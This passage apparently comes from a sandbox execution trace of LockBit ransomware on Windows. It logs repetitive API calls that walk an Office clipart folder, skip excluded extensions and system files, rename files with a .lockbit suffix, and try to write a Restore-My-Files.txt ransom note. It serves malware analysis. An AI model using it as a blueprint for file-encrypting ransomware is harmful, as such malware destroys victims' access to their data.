ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.188] malloc (_Size=0x40068) returned 0x3df0008 [0167.188] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=14630) returned 1 [0167.188] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.189] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.189] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0167.189] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.189] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.189] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0167.189] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0167.194] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00720_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00720_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.195] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.195] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0167.195] free (_Block=0x1fa2ed8) [0167.195] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00720_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.195] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.195] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.195] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe80c3400, ftCreationTime.dwHighDateTime=0x1bd4b2c, ftLastAccessTime.dwLowDateTime=0x59c8edf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe80c3400, ftLastWriteTime.dwHighDateTime=0x1bd4b2c, nFileSizeHigh=0x0, nFileSizeLow=0x1afc, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE00723_.WMF", cAlternateFileName="")) returned 1 [0167.195] lstrcmpiW (lpString1=".", lpString2="PE00723_.WMF") returned -1 [0167.195] lstrcmpiW (lpString1="..", lpString2="PE00723_.WMF") returned -1 [0167.195] PathFindExtensionW (pszPath="PE00723_.WMF") returned=".WMF" [0167.195] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.195] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.195] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.195] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.195] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.195] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.195] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.195] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.195] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.195] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.195] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.195] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.195] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.196] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.196] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.196] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.196] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.196] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.196] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.196] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.196] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.196] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.196] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.196] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.196] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.196] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.196] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.196] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.196] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.196] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.196] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.196] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.196] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.196] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.196] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.196] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.196] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.196] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.196] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.196] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.196] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.197] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.197] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.197] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.197] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.197] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.197] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.197] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE00723_.WMF") returned 1 [0167.197] lstrcmpiW (lpString1="ntldr", lpString2="PE00723_.WMF") returned -1 [0167.197] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE00723_.WMF") returned -1 [0167.197] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE00723_.WMF") returned -1 [0167.197] lstrcmpiW (lpString1="autorun.inf", lpString2="PE00723_.WMF") returned -1 [0167.197] lstrcmpiW (lpString1="thumbs.db", lpString2="PE00723_.WMF") returned 1 [0167.197] lstrcmpiW (lpString1="iconcache.db", lpString2="PE00723_.WMF") returned -1 [0167.197] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.197] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00723_.WMF") returned=".WMF" [0167.197] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.197] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.197] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.197] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.197] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.197] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.197] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.197] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.197] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.197] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.197] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.198] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.198] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.198] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.198] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.198] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.198] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.198] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.198] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.198] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.198] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.198] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.198] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.198] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.198] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.198] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.198] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.198] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.198] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00723_.WMF.lockbit") returned 72 [0167.198] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00723_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00723_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0167.199] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.199] malloc (_Size=0x40068) returned 0x3df0008 [0167.200] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=6908) returned 1 [0167.200] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.200] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.200] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0167.200] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.201] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.201] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0167.201] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0167.206] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00723_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00723_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.206] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.206] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0167.207] free (_Block=0x1fa2ed8) [0167.208] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00723_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.208] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.208] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.208] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d02b300, ftCreationTime.dwHighDateTime=0x1c04210, ftLastAccessTime.dwLowDateTime=0x59c8edf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1d02b300, ftLastWriteTime.dwHighDateTime=0x1c04210, nFileSizeHigh=0x0, nFileSizeLow=0xb1a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE00726_.WMF", cAlternateFileName="")) returned 1 [0167.208] lstrcmpiW (lpString1=".", lpString2="PE00726_.WMF") returned -1 [0167.208] lstrcmpiW (lpString1="..", lpString2="PE00726_.WMF") returned -1 [0167.208] PathFindExtensionW (pszPath="PE00726_.WMF") returned=".WMF" [0167.208] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.208] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.208] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.208] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.208] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.208] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.208] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.208] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.208] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.208] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.208] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.208] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.208] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.208] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.208] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.208] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.208] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.209] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.209] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.209] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.209] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.209] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.209] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.209] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.209] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.209] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.209] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.209] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.209] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.209] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.209] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.209] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.209] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.209] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.209] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.209] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.209] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.209] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.209] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.209] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.209] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.209] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.209] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.209] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.209] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.209] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.210] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.210] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE00726_.WMF") returned 1 [0167.210] lstrcmpiW (lpString1="ntldr", lpString2="PE00726_.WMF") returned -1 [0167.210] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE00726_.WMF") returned -1 [0167.210] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE00726_.WMF") returned -1 [0167.210] lstrcmpiW (lpString1="autorun.inf", lpString2="PE00726_.WMF") returned -1 [0167.210] lstrcmpiW (lpString1="thumbs.db", lpString2="PE00726_.WMF") returned 1 [0167.210] lstrcmpiW (lpString1="iconcache.db", lpString2="PE00726_.WMF") returned -1 [0167.210] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.210] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00726_.WMF") returned=".WMF" [0167.210] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.210] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.210] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.210] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.210] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.210] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.210] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.210] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.210] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.210] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.210] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.210] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.210] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.210] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.210] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.210] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.210] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.210] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.211] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.211] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.211] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.211] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.211] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.211] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.211] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.211] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.211] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.211] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.211] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00726_.WMF.lockbit") returned 72 [0167.211] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00726_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00726_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0167.212] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.212] malloc (_Size=0x40068) returned 0x3df0008 [0167.212] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=45476) returned 1 [0167.212] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.213] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.213] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0167.213] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.213] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.213] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0167.213] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0167.218] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00726_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00726_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.218] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.218] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0167.220] free (_Block=0x1fa2ed8) [0167.221] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00726_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.221] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.221] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.221] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfefd5700, ftCreationTime.dwHighDateTime=0x1bd4b29, ftLastAccessTime.dwLowDateTime=0x59c8edf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfefd5700, ftLastWriteTime.dwHighDateTime=0x1bd4b29, nFileSizeHigh=0x0, nFileSizeLow=0x9e2c, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE00737_.WMF", cAlternateFileName="")) returned 1 [0167.221] lstrcmpiW (lpString1=".", lpString2="PE00737_.WMF") returned -1 [0167.221] lstrcmpiW (lpString1="..", lpString2="PE00737_.WMF") returned -1 [0167.221] PathFindExtensionW (pszPath="PE00737_.WMF") returned=".WMF" [0167.221] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.221] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.221] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.221] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.221] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.221] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.221] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.221] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.221] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.221] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.221] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.221] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.221] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.221] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.221] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.221] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.221] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.221] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.222] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.222] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.222] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.222] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.222] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.222] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.222] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.222] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.222] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.222] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.222] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.222] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.222] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.222] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.222] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.222] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.222] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.222] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.222] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.222] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.222] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.222] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.222] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 